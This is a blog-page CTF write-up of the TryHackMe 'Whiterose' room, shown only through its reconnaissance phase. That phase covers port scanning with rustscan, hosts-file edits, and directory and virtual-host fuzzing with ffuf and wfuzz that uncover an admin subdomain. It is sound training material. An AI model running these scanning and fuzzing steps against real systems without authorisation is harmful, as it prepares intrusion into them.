<!doctype html>














<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" >
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.3.4" />
<meta property="og:title" content="Whiterose" />
<meta name="author" content="Anas" />
<meta property="og:locale" content="en" />
<meta name="description" content="Yet another Mr. Robot themed challenge." />
<meta property="og:description" content="Yet another Mr. Robot themed challenge." />
<link rel="canonical" href="http://localhost:4000/posts/thm-whiterose/" />
<meta property="og:url" content="http://localhost:4000/posts/thm-whiterose/" />
<meta property="og:site_name" content="NullBrunk" />
<meta property="og:image" content="http://localhost:4000/assets/img/writeups/thm/whiterose/whiterose.png" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2025-01-01T16:00:00+00:00" />
<meta name="twitter:card" content="summary_large_image" />
<meta property="twitter:image" content="http://localhost:4000/assets/img/writeups/thm/whiterose/whiterose.png" />
<meta property="twitter:title" content="Whiterose" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Anas","url":"https://github.com/NullBrunk/"},"dateModified":"2025-01-02T21:29:07+00:00","datePublished":"2025-01-01T16:00:00+00:00","description":"Yet another Mr. Robot themed challenge.","headline":"Whiterose","image":"http://localhost:4000/assets/img/writeups/thm/whiterose/whiterose.png","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/thm-whiterose/"},"url":"http://localhost:4000/posts/thm-whiterose/"}</script>
<!-- End Jekyll SEO tag -->


  <title>Whiterose | NullBrunk
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="NullBrunk">
<meta name="application-name" content="NullBrunk">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  <!-- Resource Hints -->
  
    
      
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
    
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
    
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
    
  

  <!-- Bootstrap -->
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css">
  

  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.1/css/all.min.css">

  <!-- 3rd-party Dependencies -->

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.32.2/dist/tocbot.min.css">
  

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  

  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  

  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->



<!-- layout specified -->


  

  
    <!-- image lazy-loading & popup & clipboard -->
    
  















  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  



  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.13/dayjs.min.js,npm/dayjs@1.11.13/locale/en.js,npm/dayjs@1.11.13/plugin/relativeTime.js,npm/dayjs@1.11.13/plugin/localizedFormat.js,npm/tocbot@4.32.2/dist/tocbot.min.js"></script>







<script defer src="/assets/js/dist/post.min.js"></script>



<!-- Pageviews -->

  

  



  

  <!-- A placeholder to allow defining custom metadata -->

</head>


  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/img/favicons/logo.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">NullBrunk</a>
    <p class="site-subtitle fst-italic mb-0">Leader of <a target="_blank" class="blue-link" href="https://ctftime.org/team/368433">fish3r</a> CTF team,<br>web pentester.</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
          
          <li class="nav-item">
            <a href="/tools/" class="nav-link">
              <i class="fa-fw fas fas fa-code"></i>
              

              <span>TOOLS</span>
            </a>
          </li>
        
        <!-- .nav-item -->
      
          
          <li class="nav-item">
            <a href="/prog/" class="nav-link">
              <i class="fa-fw fas fa-screwdriver-wrench"></i>
              

              <span>PROG</span>
            </a>
          </li>
        
        <!-- .nav-item -->
      
          
          <li class="nav-item">
            <a href="/tags/" class="nav-link">
              <i class="fa-fw fas fa-tags"></i>
              

              <span>TAGS</span>
            </a>
          </li>
        
        <!-- .nav-item -->
      
          
          <li class="nav-item">
            <a href="/about/" class="nav-link">
              <i class="fa-fw fas fa-info-circle"></i>
              

              <span>ABOUT</span>
            </a>
          </li>
        
        <!-- .nav-item -->
      
        
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap justify-content-center align-items-center w-100">
    <a href="https://ctftime.org/user/157452" aria-label="github" target="_blank" rel="noopener noreferrer">
      <i class="fa-regular fa-font-awesome"></i>
    </a>


    
      

      
        <a
          href="https://www.root-me.org/NullBrunk?q=%2FNullbrunk"
          aria-label="root-me"
          

          

          

          
        >
          <i class="fas fa-skull"></i>
        </a>
      
    
      

      
        <a
          href="https://github.com/nullbrunk"
          aria-label="github"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
    
      

      
        <a
          href="https://www.linkedin.com/in/anas-idiri-b05733229"
          aria-label="linkedin"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-linkedin"></i>
        </a>
      
    
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!--  include topbar.html lang=lang -->

        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->



<!-- Handle images -->




  
  

  
    
      
      
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  

  


<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  




<!-- return -->










<header id="topbar-wrapper" aria-label="Top Bar">
    <div id="topbar" class="d-flex align-items-center justify-content-between h-100" >
        <nav id="breadcrumb" aria-label="Breadcrumb">
            <span><a href="/">Home</a></span>
             

            
                <span>
                 <a href="/categories/writeups/">Writeups</a>
                </span>
            
                <span>
                 <a href="/categories/tryhackme/">TryHackMe</a>
                </span>
            

             
             
            

            
             
            
            <span>Whiterose</span>
        </nav>
    </div>
</header>

<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>Whiterose</h1>
    
      <p class="post-desc fw-light mb-4">Yet another Mr. Robot themed challenge.</p>
    

    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1735747200"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Jan  1, 2025
</time>

      </span>

      <!-- lastmod date -->
      
        <span>
          Updated
          <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1735853347"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Jan  2, 2025
</time>

        </span>
      

      
        
        
        

        

        <div class="mt-3 mb-3">
          <a href="/assets/img/writeups/thm/whiterose/whiterose.png" class="popup img-link preview-img shimmer"><img src="/assets/img/writeups/thm/whiterose/whiterose.png"  alt="Preview Image" width="1200" height="630"  loading="lazy"></a></div>
      

      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          

          By

          <em>
            
              
                <a href="https://github.com/NullBrunk/">Anas</a>
                
              
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          

          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->



<!-- words per minute -->










<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="1377 words"
>
  <em>7 min</em> read</span>

        </div>
      </div>
    </div>
  </header>

  
    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">Whiterose</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">Contents</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">Whiterose</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  

  <div class="content">
    <h1 id="introduction">Introduction</h1>

<p>Hello everyone, today we will be taking a look at <a href="https://tryhackme.com/r/room/whiterose">Whiterose</a>, an <span class="easy">Easy</span> rated room on <a href="https://tryhackme.com/">TryHackMe</a>. We will explore the exploitation of a vulnerable Express.js webapp through IDOR and SSTI, before moving on to the privilege escalation phase. Let’s get started !</p>

<ol>
  <li>Enumeration
    <ul>
      <li><a href="#portscan">Portscan</a></li>
      <li><a href="#http-80">HTTP (80)</a>
        <ul>
          <li><a href="#directory-fuzzing">Directory Fuzzing</a></li>
          <li><a href="#virtual-host-fuzzing">Virtual Host fuzzing</a></li>
          <li><a href="#admin-subdomain">Admin Subdomain</a>
            <ul>
              <li><a href="#user-access">User access</a></li>
              <li><a href="#admin-access">Admin access</a></li>
            </ul>
          </li>
          <li><a href="#identifying-the-template-engine">Identifying the template engine</a></li>
          <li><a href="#looking-for-vulnerabilities">Looking for vulnerabilities</a></li>
        </ul>
      </li>
    </ul>
  </li>
  <li>Exploitation
    <ul>
      <li><a href="#cve-2024-33883">CVE-2024-33883</a></li>
      <li><a href="#cve-2023-29827">CVE-2023-29827</a></li>
      <li><a href="#cve-2022-29078">CVE-2022-29078</a>
        <ul>
          <li><a href="#writing-a-script">Writing a scripting</a></li>
          <li><a href="#getting-rce">Getting RCE</a></li>
        </ul>
      </li>
    </ul>
  </li>
  <li>Privesc
    <ul>
      <li><a href="#sudo--l">sudo -l</a></li>
      <li><a href="#sudoedit">Sudoedit</a></li>
    </ul>
  </li>
</ol>

<hr />

<p><br /></p>

<h1 id="enum">Enum</h1>

<h2 id="portscan"><span class="me-2">Portscan</span><a href="#portscan" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>Let’s start with a basic portscan. I like to go with <a href="https://github.com/RustScan/RustScan">rustscan</a> cause it’s quite fast. As always, I go with <code class="language-plaintext highlighter-rouge">service version</code> enumeration and <code class="language-plaintext highlighter-rouge">output normal</code> options:</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>rustscan <span class="nt">-a</span> <span class="nv">$TARGET</span> <span class="nt">--</span> <span class="nt">-sV</span> <span class="nt">-oN</span> all_ports.txt
</pre></td></tr></tbody></table></code></div></div>

<div file="all_ports.txt" class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="all_ports.txt"><i class="far fa-file-code fa-fw"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre>22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
80/tcp open  http    nginx 1.14.0 <span class="o">(</span>Ubuntu<span class="o">)</span>
</pre></td></tr></tbody></table></code></div></div>

<p><strong>What do we learn from this portscan ?</strong></p>
<ul>
  <li>The target is likely running linux</li>
  <li>SSH and HTTP are running</li>
</ul>

<h2 id="http-80"><span class="me-2">HTTP (80)</span><a href="#http-80" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>Usually, SSH isn’t a primary target in CTFs, unlike HTTP, so let’s start with that.</p>

<p><a href="/assets/img/writeups/thm/whiterose/index.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/whiterose/index.png" alt="index"  loading="lazy"></a>
<em>It’s trying to redirect us to a domain.</em></p>

<p>I added this domain to my <code class="language-plaintext highlighter-rouge">/etc/hosts</code> file with this bash one-liner:</p>
<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="nb">sudo </span>bash <span class="nt">-c</span> <span class="s1">'echo "10.10.181.178 cyprusbank.thm" &gt;&gt; /etc/hosts'</span>
</pre></td></tr></tbody></table></code></div></div>
<p><a href="/assets/img/writeups/thm/whiterose/index_domain_name.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/whiterose/index_domain_name.png" alt="index"  loading="lazy"></a>
<em>Accessing the index page of the new domain.</em></p>

<p>But still nothing interesting.</p>

<h3 id="directory-fuzzing"><span class="me-2">Directory Fuzzing</span><a href="#directory-fuzzing" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>I thought maybe trying some <a href="https://www.thehacker.recipes/web/recon/directory-fuzzing">directory fuzzing</a> could be a good idea.
You can use whatever tool you like (<a href="https://www.kali.org/tools/gobuster/">gobuster</a>, <a href="https://www.kali.org/tools/dirbuster/">dirbuster</a>, <a href="https://www.kali.org/tools/dirb/">dirb</a>…). I’ll go with <a href="https://www.kali.org/tools/ffuf/">ffuf</a>:</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>ffuf <span class="nt">-u</span> <span class="s2">"http://cyprusbank.thm/FUZZ"</span> <span class="nt">-w</span> /usr/share/wordlists/common.txt

index.html              <span class="o">[</span>Status: 200, Size: 252, Words: 19, Lines: 9, Duration: 368ms]
</pre></td></tr></tbody></table></code></div></div>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>ffuf <span class="nt">-u</span> <span class="s2">"http://cyprusbank.thm/FUZZ"</span> <span class="nt">-w</span> /usr/share/wordlists/big.txt

// nothing found
</pre></td></tr></tbody></table></code></div></div>

<p>I tried the <a href="https://github.com/v0re/dirb/blob/master/wordlists/common.txt">common.txt</a> and <a href="https://github.com/v0re/dirb/blob/master/wordlists/big.txt">big.txt</a> wordlists from <code class="language-plaintext highlighter-rouge">dirb</code>, but I still didn’t find anything.</p>

<h3 id="virtual-host-fuzzing"><span class="me-2">Virtual Host fuzzing</span><a href="#virtual-host-fuzzing" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>Since we have a domain name, trying <a href="https://www.thehacker.recipes/web/recon/virtual-host-fuzzing">virtual host fuzzing</a> might be a good idea. I’ll go with <a href="https://www.kali.org/tools/wfuzz/">wfuzz</a> but you can use ffuf or gobuster as mentioned in the article.</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre>wfuzz <span class="nt">-u</span> cyprusbank.thm <span class="nt">-H</span> <span class="s2">"Host: FUZZ.cyprusbank.thm"</span> <span class="se">\</span>
      <span class="nt">-w</span> /opt/seclists/Discovery/DNS/subdomains-top1million-5000.txt
</pre></td></tr></tbody></table></code></div></div>

<p><a href="/assets/img/writeups/thm/whiterose/wfuzz_getting_number_of_words_in_false.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/whiterose/wfuzz_getting_number_of_words_in_false.png" alt="index"  loading="lazy"></a>
<em>Getting the number of words in the response.</em></p>

<p>As you may have noticed, <code class="language-plaintext highlighter-rouge">wfuzz</code> shows a different <strong>number of words</strong> in the response depending on whether the tested domain is an <strong>existing</strong> virtual host or <strong>not</strong>. Since we know that a non-existent subdomain returns <code class="language-plaintext highlighter-rouge">3</code> words, we can ask <code class="language-plaintext highlighter-rouge">wfuzz</code> to hide all the responses that contain <code class="language-plaintext highlighter-rouge">3</code> words</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>wfuzz <span class="nt">-u</span> cyprusbank.thm <span class="nt">-H</span> <span class="s2">"Host: FUZZ.cyprusbank.thm"</span> <span class="se">\</span>
      <span class="nt">-w</span> /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt <span class="se">\</span>
      <span class="nt">--hw</span> 3 
</pre></td></tr></tbody></table></code></div></div>

<p><a href="/assets/img/writeups/thm/whiterose/fuzzing_domains.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/whiterose/fuzzing_domains.png" alt="index"  loading="lazy"></a>
<em>Hiding responses that contains 3 words.</em></p>

<h3 id="admin-subdomain"><span class="me-2">Admin Subdomain</span><a href="#admin-subdomain" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>Okay, so <code class="language-plaintext highlighter-rouge">wfuzz</code> found <code class="language-plaintext highlighter-rouge">1</code> new interesting subdomain (since <code class="language-plaintext highlighter-rouge">www</code> is usually not interesting). Let’s add it to our <code class="language-plaintext highlighter-rouge">/etc/hosts</code> file:</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="nb">sudo </span>bash <span class="nt">-c</span> <span class="s1">'echo "10.10.181.178 admin.cyprusbank.thm" &gt;&gt; /etc/hosts'</span>
</pre></td></tr></tbody></table></code></div></div>

<p>And access it from our browser:</p>

<p><a href="/assets/img/writeups/thm/whiterose/login_page.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/whiterose/login_page.png" alt="index"  loading="lazy"></a>
<em>Finally !</em></p>

<h4 id="user-access"><span class="me-2">User access</span><a href="#user-access" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<p>The challenge says</p>
<blockquote>
